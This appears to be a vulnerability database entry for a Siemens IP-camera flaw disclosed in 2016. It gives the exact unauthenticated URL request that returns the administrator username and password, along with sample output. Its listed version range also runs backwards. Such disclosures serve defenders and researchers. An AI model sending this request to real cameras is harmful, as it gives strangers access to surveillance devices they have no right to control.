vendor:
IP-Camera
by:
Yakir Wizman
9
CVSS
CRITICAL
Username / Password Disclosure
N/A
CWE
Product Name: IP-Camera
Affected Version From: x.2.2.1798
Affected Version To: x.2.2.1235
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: CVMS2025-IR, CCMS2025
2016
SIEMENS IP-Camera Unauthenticated Remote Credentials Disclosure
SIEMENS IP-Camera (CVMS2025-IR + CCMS2025) allows to unauthenticated user disclose the username & password remotely by simple request which made by browser. Simply go to the following url: http://host:port/cgi-bin/readfile.cgi?query=ADMINID Should return some javascript variable which contain the credentials and other configuration vars: var Adm_ID="admin"; var Adm_Pass1=“admin”; var Adm_Pass2=“admin”; var Language=“en”; var Logoff_Time="0";
Mitigation:
Contact the vendor for further information regarding the proper mitigation of this vulnerabiliy.